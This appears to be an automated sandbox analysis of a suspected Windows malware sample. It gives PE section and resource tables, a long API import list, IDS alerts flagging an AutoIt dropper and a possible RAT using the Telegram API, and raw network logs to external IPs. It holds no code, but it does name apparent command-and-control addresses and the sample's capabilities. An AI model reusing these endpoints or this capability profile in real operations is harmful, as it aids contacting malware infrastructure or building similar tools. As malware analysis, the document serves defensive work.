.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x4a858 | 0x4aa00 | 9d6f3e9a0d4624317cf92d8067628f1d | False | 0.14213973513400335 | data | 5.124345458773063 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab568 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab690 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab7b8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab8e0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xac788 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.3546931407942238
RT_ICON | 0xad030 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.40173410404624277
RT_ICON | 0xad598 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | English | Great Britain | 0.12139391070213333
RT_ICON | 0xef5c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.31441908713692945
RT_ICON | 0xf1b68 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.4202626641651032
RT_ICON | 0xf2c10 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.62677304964539
RT_MENU | 0xf3078 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xf30c8 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xf31c8 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xf36f8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xf3d88 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xf4258 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xf4858 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xf4eb8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xf5240 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xf5398 | 0x68 | data | English | Great Britain | 0.6923076923076923
RT_GROUP_ICON | 0xf5400 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xf5418 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xf5430 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xf5448 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xf55e8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                                                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                                                                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                                                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                                                                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                                                                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                                                                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, 
GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll: GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll: DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll: DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll: VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-29T10:57:11.769478+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:11.769478+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:14.183543+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:14.183543+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:20.485145+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49741 | 104.16.184.241 | 80 | TCP
2024-11-29T10:57:29.778769+0100 | 2029323 | ET MALWARE Possible Generic RAT over Telegram API | 1 | 192.168.2.4 | 49748 | 149.154.167.220 | 443 | TCP
2024-11-29T10:57:31.307649+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:31.307649+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:31.713755+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:31.713755+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:53.448959+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:53.448959+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:53.857531+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:57:53.857531+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:15.592309+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:15.592309+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:15.999747+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:15.999747+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:37.702732+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:37.702732+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:38.114926+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:38.114926+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:59.824195+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:58:59.824195+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:59:00.231281+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
2024-11-29T10:59:00.231281+0100 | 2834392 | ETPRO MALWARE Win32.Dropper.cc.AU3 IP Check | 1 | 192.168.2.4 | 49731 | 188.138.68.212 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.984647036 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.985645056 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.985716105 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987610102 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987632990 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987893105 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987905025 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.987934113 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:11.988140106 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.008105040 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.008187056 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.034348011 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.035331964 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.049983025 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.164031029 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.164061069 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.164295912 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.224194050 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.357299089 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.357677937 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.358159065 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.359052896 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.361587048 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.395200014 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.395222902 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.395450115 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.396357059 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.399338007 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.403330088 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.403335094 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.403346062 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.407337904 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.443326950 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.673494101 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.674457073 CET44349735185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.674536943 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.681587934 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.681683064 CET44349733185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.681745052 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.682566881 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686558962 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686599016 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686618090 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686641932 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686677933 CET44349732185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686682940 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.686717987 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.688131094 CET49735443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.688246965 CET49733443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.688462973 CET49732443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.690316916 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696834087 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696872950 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696896076 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696913958 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696928024 CET44349736185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.696976900 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.697465897 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.697597027 CET49736443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.699701071 CET44349737185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.699764013 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.700016975 CET49737443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.729471922 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.730590105 CET44349734185.199.110.133192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.730650902 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:12.731056929 CET49734443192.168.2.4185.199.110.133
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.238050938 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.238146067 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.320524931 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.320557117 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.320648909 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.321096897 CET49739443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.321108103 CET44349739149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.358839035 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.358867884 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.359106064 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.359179020 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.362778902 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.403331995 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775348902 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775372982 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775405884 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775440931 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.775473118 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.776473999 CET49738443192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.776494026 CET44349738188.138.68.212192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:13.782089949 CET4973180192.168.2.4188.138.68.212
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186341047 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186347008 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186443090 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186450005 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186517000 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186522961 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186650991 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186657906 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186954975 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.186961889 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.187155962 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.187161922 CET4434974331.14.70.249192.168.2.4
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.187241077 CET49743443192.168.2.431.14.70.249
                                                                                                                                                                                                                                                          Nov 29, 2024 10:57:24.187268972 CET4434974331.14.70.249192.168.2.4
